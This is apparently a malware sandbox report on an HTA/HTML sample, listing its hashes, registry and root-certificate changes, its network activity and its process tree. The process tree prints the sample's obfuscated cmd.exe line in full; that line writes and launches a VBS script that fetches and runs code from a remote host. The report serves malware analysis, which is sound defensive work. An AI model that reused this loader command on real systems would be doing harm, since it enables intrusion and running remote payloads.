2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987

Resubmissions

23-01-2024 09:55

240123-lx88nsaaf2 8

22-01-2024 16:15

240122-tqdr7aahc3 8

Analysis

max time kernel
149s
max time network
159s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
22-01-2024 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Size

7KB
MD5

f3ab9f8fe8995462c3245f10ed76ae4f
SHA1

6aa8e54760bcc9aa7402e75d7cb33011e0673f7f
SHA256

2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987
SHA512

68d097848803e6c9f009ee41da373b5ce1136e40c750c0c704a137ca1a11bd483dc1f06089e9eb9310b47ee7232ac6bc8ad6c302bbe064765f266efef579848b
SSDEEP

192:CzHyJ1AwYaKyJ0VmW98+n6z39EPHzyKQSOOUHdLqmTlphHBLmBdexU+4ur6kUjRd:CzyJ1pROT

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
5	2644	WScript.exe
8	2644	WScript.exe
10	2644	WScript.exe
12	2644	WScript.exe
14	2644	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d80bef292bee784c8e3c940d61fdfeb800000000020000000000106600000001000020000000de600f8723d8c537763ce0b67fb734fcfbb04d2bdd997af0aaa6fda55ccf0837000000000e800000000200002000000054c18804485ffc51254ab0cda57613af29f4d8b9dc84fe70abfe71370b553780200000003a8e347bfffc94b85ec62707327571c6855bb1078582c8f8867353d5c8d74e7640000000b4a5392ab258a24d9e1f607ccdc31e2375b8edbb83be62c0ac5ac03bb11764fec03e4ab473c408cbb6b32d70c44ac2860fcf8f1d8eea1c0620e1c7f4cf29c73e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412102005"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{79AAB721-B941-11EE-A2F4-4AE60EE50717} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8055b44e4e4dda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d80bef292bee784c8e3c940d61fdfeb8000000000200000000001066000000010000200000005910d55b227aee4c2e580d1015da91ea19685baec7f24dc80b32b998e7edba81000000000e8000000002000020000000af21e2403d575176eace8edeb0350d4f21c3aa9f3f6d24a14d875ffc2ca5381f90000000c1772644f25a1c962a6b34d29285518ee7b7ba873e7cb2a10653db6b6ba67e388b2fb3bb5183fc5e42105dd807202f0012fc725f0640b23e71759e87a673f4804dfb6d73b0bb55a0747609e5c20c34d35e10a95774366690319dab69cfff8445894d7f2064ea108b05a234448b80f5426c5db6cc031b50759ff83cb7c1da98dbf9ec366ed9b14acf15104e6e2591fc2a40000000e001b2145c95d95fa4fdcb5502094b447718b879be0ae2d8237f83d55b9461d831c3781dfda065cfa031b86617a7f6d7fde01dcc866bf8f2a3b73e295905120d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	WScript.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2928	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2928	iexplore.exe
2928	iexplore.exe
2720	IEXPLORE.EXE
2720	IEXPLORE.EXE
2720	IEXPLORE.EXE
2720	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 2720	2928	iexplore.exe	28
PID 2928 wrote to memory of 2720	2928	iexplore.exe	28
PID 2928 wrote to memory of 2720	2928	iexplore.exe	28
PID 2928 wrote to memory of 2720	2928	iexplore.exe	28
PID 2720 wrote to memory of 2108	2720	IEXPLORE.EXE	29
PID 2720 wrote to memory of 2108	2720	IEXPLORE.EXE	29
PID 2720 wrote to memory of 2108	2720	IEXPLORE.EXE	29
PID 2720 wrote to memory of 2108	2720	IEXPLORE.EXE	29
PID 2108 wrote to memory of 2708	2108	cmd.exe	31
PID 2108 wrote to memory of 2708	2108	cmd.exe	31
PID 2108 wrote to memory of 2708	2108	cmd.exe	31
PID 2108 wrote to memory of 2708	2108	cmd.exe	31
PID 2708 wrote to memory of 2644	2708	cmd.exe	32
PID 2708 wrote to memory of 2644	2708	cmd.exe	32
PID 2708 wrote to memory of 2644	2708	cmd.exe	32
PID 2708 wrote to memory of 2644	2708	cmd.exe	32

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2928 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /V/D/c EcHo Z5ceEsS49="." : FunctIon Tji57(H27N20):NiF24 = Array(":","t","r","c","1"):Tji57 = NiF24(H27N20):end function :: fm6fciL34 = "S"+ Tji57(3) +"rip"+ Tji57(1) + Tji57(0) + "hT"+ Tji57(1) +"ps://contdlk"+Z5ceEsS49+"bounceme"+Z5ceEsS49+"net/g1":eval("Ge"+ Tji57(1) +"Obje"+ Tji57(3)+ Tji57(1) +"(fm6fciL34)") > nul > C:\Users\Public\^dmpRBh785.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - \??\c:\windows\SysWOW64\cmd.exe
      c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"
        5⤵
        Blocklisted process makes network request
        Modifies system certificate store
        
        PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
993951a22776beabc696fe46266c8727

SHA1
621b0fa84ee168a12fedd095a7935121826bc19d

SHA256
4d2463844a756ef7c070a8d54a09f16ea67ac773e79044e2c8fa7a8fde2ea6ea

SHA512
46dc24fddcc500ba01e8ee4e1c301434450cff3ffc81041c6e9d61ba7d57c9d7f2a7ef22a0b0dfeacd012ef2756b7724ea5f8bf1702444bbce68e45c55f6069b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
17cde952bacb4141e29b1212a60a44ae

SHA1
dfb47e0abc963dcaf28f905643cd8c8a0fbd6061

SHA256
1648f9b73c9c881abb06f57cf6df40fc4e561baad473ad78f23d993ec569af64

SHA512
7d789e873ae7ab4ea4b117e4f011287b681c8518997f73f06ec63c67007ce577f53a65531f4e18217d554fb557a3292dbbbbee00dcaab24e94700eee5d6ab848

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ca74d263d4e01b37b4a491ee45698cf3

SHA1
f5f6432c51102f55789a1c1e4ddee7b20f835a89

SHA256
80d5a3885a3c24ddddcbbd1718d001fbe38021f72d7d61eec0d915c35e335322

SHA512
4c466fe7eaddbda32e5bb6a5f860136847820f14866e1fa49cd810dfd033b213d441030eb48c4063dc887799fbed3f941fefaff4429a6e7d981abba088e7d7ed

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8ec2c793b72041bff0f17094cc8ecdb3

SHA1
a3eb1383a90dccaae1456a03ea570edf22618b44

SHA256
a545f720b9d5e1b664cdfeb653bf3f8919ac07f28b39fb4ba2a9c0865187368d

SHA512
11bd355e61730d98322d9408790a8a5244d22e48a40cd96a6da8e32c99a3ceede10bc4dff3344237c9415405e46a3340b2320e8f9c0cd24ed997c50b01669e36

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e1104ef0a4cef49225fa1cfe56109148

SHA1
aecd9f95e763f145960752269cdf5415ce9e73a7

SHA256
4ebcce01e4b537baccbfd17647f2af262ac2de68e6e3fdd1b722ad61b7fc6908

SHA512
556fec20f880a17804f1906eb20c6615ff1707a2762be5b955e4ceadecc7c8e9c4d3ae61f39cc9c9d5b5f1cdafa6d2d42d7fa17ec42cf92ff19296de840d5086

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f0f1edac67f639753d22825e7489ae26

SHA1
020919ee290458fd0d874d453230ec0e496fd6e8

SHA256
5621fa818a9e696b4d186ce1a8e0e0b5f02a1f6658cf33867a45e5f28dfebf0d

SHA512
58425dabb812eeb03729bc277acb0cb7ff69da58b043e0376bfa9500e059d0d6cc84828acc4e7b04f1190e52ddc0dc97bb905fd2d10dff04562b809e424dc62b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c7f696d1b91e316133e9f93e935ef209

SHA1
43333db3b395b6d1cf92f65900d1f1171e9b6bff

SHA256
0f3f580bf071546d57597a9e1710d2e49b48ef65b0f2a86bb409fc2e4a9991e2

SHA512
f8ab8cb6dd4ce60013d3845bcf58d059a5c3e638ef5cdc8f11901eb7cb18a49c64215fa0af2631770a67096bdee3c57e937a96e8651349f74e6cf9b7ed99f2c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
adb2dd5578d068e78c09b2fec7c602b0

SHA1
